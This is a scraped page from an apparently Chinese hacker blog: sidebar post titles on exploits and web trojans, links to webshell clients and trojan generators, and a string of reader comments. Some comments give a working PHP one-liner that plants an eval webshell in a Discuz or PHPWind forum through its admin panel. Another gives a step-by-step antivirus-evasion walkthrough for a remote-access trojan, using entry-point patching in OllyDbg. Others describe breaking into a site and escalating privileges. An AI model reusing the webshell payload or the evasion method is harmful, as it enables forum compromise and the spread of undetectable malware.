User Panel
Calendar
| « 2026 » « March » | ||||||
| Su | Mo | Tu | We | Th | Fr | Sa |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
| 29 | 30 | 31 | ||||
- phpwind 从后台拿webshell的...
- Nightwish 《She Is My Sin》
- 致给一位在虚拟世界里认识多...
- :VISTA用户请谨慎Google拼音...
- PHPWind 5.x Exploits 图形版
- For Expliot 魔力论坛
- MS07017(ani)网马安全漏洞补...
- 毛毛MSSQL2005注入工具 (测试...
- 请IT娱乐界的帅哥靓女们进来...
- 何谓 0day?
- phpBB 2.0.19 远程包含漏洞
- 本人近照 (不断更新ING.)
- MS07-009 Exploit
- 月考完,想发发骚!
- 中国十大免费电影网站排行
- 淫荡的7j大哥!
- 使用ASP .NET察看和清除你的...
- Discuz 5.0 0day + PM短信饶...
- JS隐蔽挂马
- 感情 失败者
- DVBBS <= 7.1.0 sp1 博客 远...
- 要去上学了
- 没有题目
- 谈谈对入侵ASP.net网站的经验
- <Baby Laughing - hahaha-ha>
- 浅谈web漏洞挖掘—特殊变量fu...
- phpAdsNew 2.0.7 Remote File...
- 同性恋
- 隐藏AV大法解密
- 中网S3主机安全系统
- h4x0r:很多人呼唤 此三种方式不...
- BlackRose:[eek]
- 飘零的紫:你我不是一个世界里的人...
- 断魂草:[redface] 我到, 天涯何...
- 路人:"这也是美女????? [...
- h4x0r:to x1140le: ”要命“ ...
- dingking:女的也不杂地。。。别几...
- spr1t3:[confused] 这是美女么?...
- x140le:这也是美女????? [...
- y2k:曰了。。那女的不好看啊...
Search
Statistics
Articles: 793
Comments: 710 Trackbacks: 6150
Registered Users: 464
Visitors: 1247050
Online User: 14
Comments: 710 Trackbacks: 6150
Registered Users: 464
Visitors: 1247050
Online User: 14
Links
朋友们的站 {排名不分先后}
----------
My FC2 Blog
Devil's Blog
Funny's Blog
Iooi's Blog
9xiao's Blog
J4ck's space
Mirboy's Blog
Liso's Blog
Lake2's Blog
Superhei's Blog
Sprite's Blog
7jdg's Blog
K4y's Weblog
Wuly's Blog
Whytt's Blog
Cnfjhh'blog
AmxKing's Blog
AmxKu's Blog
Scofeld's Blog
Sh@dom's Blog
Flyh4t's Blog
Kernel's Blog
King's Blog
Tr4c3's Blog
TiMothEoS's Blog
Gooooooogle's Blog
YoungGun's blog
Rubbish's Blog
强总的MSN
刀总's Blog
鬼仔's Blog
放手's Blog
阿杰's Blog
深紫's Blog
小贼's Blog
马骏's Blog
精灵's Blog
坏狼's Blog
小华's Blog
童童's Blog
猪头三's Blog
归谷客's Blog
年轻人's Blog
谈笑书生's Blog
岁月猪猪's Blog
凋凌玫瑰's Blog
古典辣妹's Blog
守护天使's Blog
冷漠男孩's Blog
在你身边's Blog
黎雯'Space
松島かえでのブログ日記
----------------------
黔龙安全网
新云网络
21世纪安全网络
DDOS攻防
----------
常去的站
----------
《YES!》Magazine
Google Hacker
Google Translate
Altavista Translate
Livedoor Translate
Yahoo Translate
Excite Translate
Online Make
MusicFever
Online Tools
香港ECHO
李开复学生网
Wikipedia.维基百科
Now香港
香港讨论区
漫步者家园
常用字体下载
新网域名管理
多引擎杀毒㈠
多引擎杀毒㈡
Lake2eval客户端
海洋顶端eval客户端
PHPeval客户端
多功能PHPclent客户端
ASP.net eval客户端
FCKeditor漏洞利用 [黑锅写的唷!]
智能网马在线生成
ANI网马在线生成
----------
本站反向链接情况
MSN
Yahoo
----------
Name: DING
Sex: Male
Job: Student
Tel: 0852-8185479
From: China
Contact Me:
Email:

Msn:

Counter:
----------
----------
My FC2 Blog
Devil's Blog
Funny's Blog
Iooi's Blog
9xiao's Blog
J4ck's space
Mirboy's Blog
Liso's Blog
Lake2's Blog
Superhei's Blog
Sprite's Blog
7jdg's Blog
K4y's Weblog
Wuly's Blog
Whytt's Blog
Cnfjhh'blog
AmxKing's Blog
AmxKu's Blog
Scofeld's Blog
Sh@dom's Blog
Flyh4t's Blog
Kernel's Blog
King's Blog
Tr4c3's Blog
TiMothEoS's Blog
Gooooooogle's Blog
YoungGun's blog
Rubbish's Blog
强总的MSN
刀总's Blog
鬼仔's Blog
放手's Blog
阿杰's Blog
深紫's Blog
小贼's Blog
马骏's Blog
精灵's Blog
坏狼's Blog
小华's Blog
童童's Blog
猪头三's Blog
归谷客's Blog
年轻人's Blog
谈笑书生's Blog
岁月猪猪's Blog
凋凌玫瑰's Blog
古典辣妹's Blog
守护天使's Blog
冷漠男孩's Blog
在你身边's Blog
黎雯'Space
松島かえでのブログ日記
----------------------
黔龙安全网
新云网络
21世纪安全网络
DDOS攻防
----------
常去的站
----------
《YES!》Magazine
Google Hacker
Google Translate
Altavista Translate
Livedoor Translate
Yahoo Translate
Excite Translate
Online Make
MusicFever
Online Tools
香港ECHO
李开复学生网
Wikipedia.维基百科
Now香港
香港讨论区
漫步者家园
常用字体下载
新网域名管理
多引擎杀毒㈠
多引擎杀毒㈡
Lake2eval客户端
海洋顶端eval客户端
PHPeval客户端
多功能PHPclent客户端
ASP.net eval客户端
FCKeditor漏洞利用 [黑锅写的唷!]
智能网马在线生成
ANI网马在线生成
----------
本站反向链接情况
MSN
Yahoo
----------
About Me
Name: DING
Sex: Male
Job: Student
Tel: 0852-8185479
From: China
Contact Me:
Email:
Msn:
Counter:
----------










此三种方式不可行。。。
下面是9xiao 的方法:
如果是winnt系统直接添加一个.asa后缀的文件,(dz可以直接传asa)在后台找到文件上传的后的文件名,论坛发个phpshell,<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>然后看图修改包含银行查件文件名bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一个a.php的最小马。还有不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>插入,然后备份wordsfb字段记下相对路径。
”要命“ ? 美女和男的相比下。是衬托出的美女噻
to dingking:
虽然不算个美女。但我是我喜欢的人啊。 现在的女人不好找。特别是处女
哈哈哈```
to 精灵:
美女不算。但我对她是有真感觉的。
只不过/../../跳出去的时候
"."改为编码了
熬夜?
0852来的
利用漏洞不是主要的.主要的是要会发掘ING..
打开 不会马上显示出结果
html里的内容是破解管理员密码后才会显示出
听说,我出生的时候,在医院上空瓢了一朵云,马上化作一个“帅”
你们怎么看?
太晚了吧,明天有个朋友过生日,今天不能通宵。
怕明天没精力和他们玩啊。放心啦,明天一定搞啦。。。
文件名字为DATDA1 DATA2 最重要的是DATA1文件 我们只要把这个文件做好就可以生成的
广外幽灵就防杀了!我们进行查杀 我们使用卡吧最新版 我们看见了都被杀了其实我们要做的就是把这两个文件进行脱壳我脱壳方式的演示我就不多说了 现在我们对他进行修改吧
要做的修改有两中方法
第一点 修改入口点
第二点 对文件加花指令 修改入口点
我们先进行第一种的进行演示吧! 我们对DATA1 我们使用查壳进行查看 第一中方法使用到的工具OLLYDBG 我们先载进DATA1 入口点 00003F20 我们在后面一位进一变为00003F21 点应用 可以了!
我们进行查杀 过了~
下面我们进行第二点进行演示 刚才没有对文件进行备份 我们对DATA1进行演示 使用到的工具OLLYDBG和OLLYDBG下面进行演示 OLLYDBG载入文件 我们只要把前面三行移动到可写的0区域 然后进行入口点的修改 我们先复制出来 看我演示 我慢慢来
复制前三行
00403F20 >/$ 55 PUSH EBP
00403F21 |. 8BEC MOV EBP,ESP
00403F23 |. 83C4 E4 ADD ESP,-1C
找0区域
004048D7 00 DB 00
这个地址就是了我们把前面的三行插进这里 这里要说明的是jmp 使用到这个指令掉回去 地址为00403F23 下面看的演示 我们覆盖上去这里 下面要使用到的工具就是PEditor 和前面的演示是一样的
我说错了~对文件加花指令 修改入口点
我也不敢确定,说不定还是老漏洞呢.
可以读到MYSQL配置文件里的信息!
but,你劫持人家的东西好象就有点过分吧?
请你说话搞明白点,这文章是我在这里看到的
http://ttian.net/website/2006/0206/1107.html
什么文章?
不会吧?被改了不要找我啊
这站的后台目录我到是找到了,权限是PUBLC的。
也有了后台管理用户密码,可以利用一下社会工程学,说不定FTP密码也一样,
实在是汗........看来维护此站的技术人员该tink about 一下了
权限可惜不是SA,但还是有办法进一步入侵.提权